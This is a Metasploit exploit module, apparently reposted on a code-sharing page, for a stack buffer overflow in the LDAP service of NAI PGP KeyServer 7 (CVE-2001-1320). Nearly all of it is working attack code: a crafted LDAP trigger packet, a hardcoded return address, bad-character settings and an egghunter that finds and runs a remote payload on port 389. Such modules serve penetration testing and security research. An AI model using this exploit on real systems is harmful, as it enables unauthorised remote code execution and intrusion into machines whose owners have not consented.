Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Remote::Egghunter
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'Network Associates PGP KeyServer 7 LDAP Buffer Overflow',
15
      'Description'    => %q{
16
          This module exploits a stack buffer overflow in the LDAP service that is
17
          part of the NAI PGP Enterprise product suite. This module was tested
18
          against PGP KeyServer v7.0. Due to space restrictions, egghunter is
19
          used to find our payload - therefore you may wish to adjust WfsDelay.
20
      },
21
      'Author'         => [ 'aushack' ],
22
      'License'        => MSF_LICENSE,
23
      'References'     =>
24
        [
25
          [ 'CVE', '2001-1320' ],
26
          [ 'OSVDB', '4742' ],
27
          [ 'BID', '3046' ],
28
          [ 'URL', 'http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/' ],
29
        ],
30
      'Privileged'     => true,
31
      'Payload'        =>
32
        {
33
          'Space'    => 450,
34
          'BadChars' => "\x00\x0a\x0d\x20",
35
          'StackAdjustment' => -3500,
36
        },
37
      'Platform'       => 'win',
38
      'Targets'        =>
39
        [
40
          ["Universal PGPcertd.exe", { 'Ret' => 0x00436b23 }], # push esp; ret PGPcertd.exe - patrick tested ok 2k/xp
41
        ],
42
      'DisclosureDate' => '2001-07-16',
43
      'DefaultTarget' => 0))
44

45
    register_options(
46
      [
47
        Opt::RPORT(389)
48
      ])
49
  end
50

51
  def exploit
52
    connect
53

54
    # - Maximum payload space is 102 so we use EggHunter instead.
55
    # - The PAYLOAD is put inside an invalid, rejected (but hunt-able) request.
56

57
    hunter	= generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
58
    egg	= hunter[1]
59

60
    eggstart = "\x30\x82\x01\xd9\x02\x01\x01\x60\x82\x01\xd2\x02\x01\x03\x04\x82\x01\xc9" # ldapsearch sniff
61
    eggend = "\x80\x00"
62

63
    print_status("Sending trigger and hunter first...")
64

65
    buf = "\x30\xfe\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x02\x0a\x01\x00\x02\x01\x00" # PROTOS suite sniff
66
    buf << [target['Ret']].pack('V') + hunter[0]
67
    buf << "\x00"
68

69
    sock.put(buf)
70

71
    disconnect
72

73
    connect
74

75
    print_status("Sending hunted payload...")
76
    sock.put(eggstart+egg+eggend)
77

78
    handler
79
    disconnect
80
  end
81
end
82

83